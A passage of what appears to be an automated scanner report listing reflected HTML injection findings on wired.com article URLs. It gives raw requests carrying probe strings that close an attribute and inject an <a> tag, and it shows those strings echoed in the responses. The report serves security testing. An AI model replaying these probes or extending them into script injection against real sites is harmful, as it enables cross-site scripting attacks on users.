Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:45 GMT
Date: Sun, 21 Nov 2010 23:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science95176"><a>ea0344b1c10 ss_discoveries c_news">
...[SNIP]...

1.230. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0515

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d23ae"><a>0f5c0610fda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesd23ae"><a>0f5c0610fda/news/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:06 GMT
Date: Sun, 21 Nov 2010 23:11:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesd23ae"><a>0f5c0610fda c_news">
...[SNIP]...

1.231. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0515

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30df0"><a>9cafe32651a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news30df0"><a>9cafe32651a/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:20 GMT
Date: Sun, 21 Nov 2010 23:11:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news30df0"><a>9cafe32651a">
...[SNIP]...

1.232. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0524

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5ec"><a>c25249c30fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceca5ec"><a>c25249c30fc/discoveries/news/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:22 GMT
Date: Sun, 21 Nov 2010 23:10:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceca5ec"><a>c25249c30fc ss_discoveries c_news">
...[SNIP]...

1.233. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0524

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0442"><a>9e37c4acab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese0442"><a>9e37c4acab2/news/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:43 GMT
Date: Sun, 21 Nov 2010 23:10:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese0442"><a>9e37c4acab2 c_news">
...[SNIP]...

1.234. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0524

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d13aa"><a>0ad5cf6d60a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsd13aa"><a>0ad5cf6d60a/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:01 GMT
Date: Sun, 21 Nov 2010 23:11:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsd13aa"><a>0ad5cf6d60a">
...[SNIP]...

1.235. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0528

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9582"><a>bcb764a9769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencee9582"><a>bcb764a9769/discoveries/news/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:29 GMT
Date: Sun, 21 Nov 2010 23:10:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee9582"><a>bcb764a9769 ss_discoveries c_news">
...[SNIP]...

1.236. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0528

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10800"><a>1d3b957fa67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries10800"><a>1d3b957fa67/news/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries10800"><a>1d3b957fa67 c_news">
...[SNIP]...

1.237. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0528

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 187f0"><a>98dbdd44018 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news187f0"><a>98dbdd44018/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:04 GMT
Date: Sun, 21 Nov 2010 23:11:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news187f0"><a>98dbdd44018">
...[SNIP]...

1.238. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/06/dayintech_0629

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49504"><a>10544948792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science49504"><a>10544948792/discoveries/news/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:07 GMT
Date: Sun, 21 Nov 2010 23:11:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science49504"><a>10544948792 ss_discoveries c_news">
...[SNIP]...

1.239. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/06/dayintech_0629

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86976"><a>98f964069b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries86976"><a>98f964069b0/news/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries86976"><a>98f964069b0 c_news">
...[SNIP]...

1.240. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/06/dayintech_0629

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5931b"><a>18d340cf7a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news5931b"><a>18d340cf7a3/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:33 GMT
Date: Sun, 21 Nov 2010 23:11:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news5931b"><a>18d340cf7a3">
...[SNIP]...

1.241. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0903

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf82e"><a>db00fe548f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencecf82e"><a>db00fe548f1/discoveries/news/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:05 GMT
Date: Sun, 21 Nov 2010 23:11:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencecf82e"><a>db00fe548f1 ss_discoveries c_news">
...[SNIP]...

1.242. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0903

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4d3a"><a>ccd81216dac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese4d3a"><a>ccd81216dac/news/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:20 GMT
Date: Sun, 21 Nov 2010 23:11:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese4d3a"><a>ccd81216dac c_news">
...[SNIP]...

1.243. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0903

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f786"><a>0483485da03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news1f786"><a>0483485da03/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:29 GMT
Date: Sun, 21 Nov 2010 23:11:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news1f786"><a>0483485da03">
...[SNIP]...

1.244. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0904

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ac5"><a>19e070cbea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceb4ac5"><a>19e070cbea0/discoveries/news/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:06 GMT
Date: Sun, 21 Nov 2010 23:11:06 GMT
